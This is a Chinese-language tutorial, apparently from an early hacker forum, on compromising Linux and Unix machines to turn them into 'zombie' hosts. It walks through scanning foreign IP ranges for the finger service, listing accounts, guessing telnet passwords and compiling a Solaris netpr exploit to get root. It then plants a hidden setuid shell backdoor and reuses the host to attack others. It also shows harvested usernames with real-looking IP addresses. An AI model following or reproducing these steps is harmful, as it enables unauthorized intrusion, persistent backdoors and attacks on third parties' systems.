获得你的第一只LINUX肉鸡*LINUX现在是越来越多的和大家在一起了，虽然本人的电脑还没有装，但这并没什么，搞个肉鸡就什么都有了，下面我们开始了*推荐网址IP段 日本，美国，印尼*软件 SUPERSCAN 流光*首先我们用SUPERSCAN扫79端口的IP，看看有哪些机子开了这个端口，也就是FINGER服务，扫到后我们算是成功了第一步，不过别高兴太早，至于为什么向下看吧*然后我们用流光开扫，流光就是方便，可以猜解出开了FINGER服务的主机帐户名，但是也许你这时就会发现流光给出了以下提示*。。。。。。FINGER开放*。。。。。。获得用户列表 禁止*呵呵，我说吧，别高兴太早，没办法重来，在用SUPERSCAN来扫，这回看看我们的手气如何*扫到开了79端口的的一整个IP段。太爽了*流光接着扫，呵呵，终于熟悉的画面出现了*Login Name TTY Idle When Where*daemon ??? < . . . . >*bin ??? < . . . . >*sys ??? < . . . . >*jeffrey ??? pts/0 <Jun 10 07:12> 203.66.149.11*daniel ??? 437 <Nov 8, 2000> 114cm.kcable.*jamie ??? 0 <Sep 12, 2000> 203.66.162.68*postgres ??? pts/2 <Sep 9, 2000> 203.66.162.80*nsadmin ??? 768 <Jul 4 17:26> 203.66.19.50*ho ??? 390 <Nov 23, 2000> 61.169.209.106*house18 ??? pts/1 <Jan 17 16:17>203.66.250.1*tong ??? pts/0 <Jul 2 13:21> 210.226. 42.69*呵呵，看来手气确实不错，转到TELNET*TELNET IP*我习惯的方式是猜密码，一个一个来，可能由于我懒，不过希望大家可以结合工具来破，要不到你没有耐心时候就会说我骗人了：）*USER TONG*PASSWD TONG*错了就在来，总有一个会对的*看看我们进来了*接下来你要看看本机有没有GCC*$$ gcc*gcc: No input files*看到没有，手气好没办法*$$ uname –a*看一下子系统是什么版本的*这样有助于你找到合适的EXPLOIT，然后提升权限*你可以采用上传的方法也可以用cat > test.c 自已写EMPLOIT*找到相应的EXPOLIT时你就可以用以下的命令了*$$ gcc -o test test.c进行编译*$$ ./test*copyright LAST STAGE OF DELIRIUMdec 1999*poland //lsd-pl.net/*/usr/lib/lp/bin/netpr solaris 2.7 sparc*usage: ./test lpserver*$$ ./test localhost 本机上的*copyright LAST STAGE OF DELIRIUMdec 1999*poland //lsd-pl.net/*/usr/lib/lp/bin/netpr solaris 2.7 sparc*# id*uid=1035(delex) gid=20(staff) euid=0(root)*看到没有，你现在在这台机子上就是ROOT了，下面你就可以做后门了*# mkdir /usr/lib/...*# cp /bin/ksh /usr/lib/…/.x*(***做个简单的后门***)*# chmod +s /usr/lib/…/.x*以后只要你运行以下的命令就可以成为ROOT了*$$ /usr/lib/.../.x*现在它就是你的肉鸡了，以后用流光扫IP时，你在发现哪台机子有什么LPD，RPC等溢出漏洞时，你就可以上你的肉鸡，然后找到相应的EXPOLIT远程溢出它了，步骤都大同小意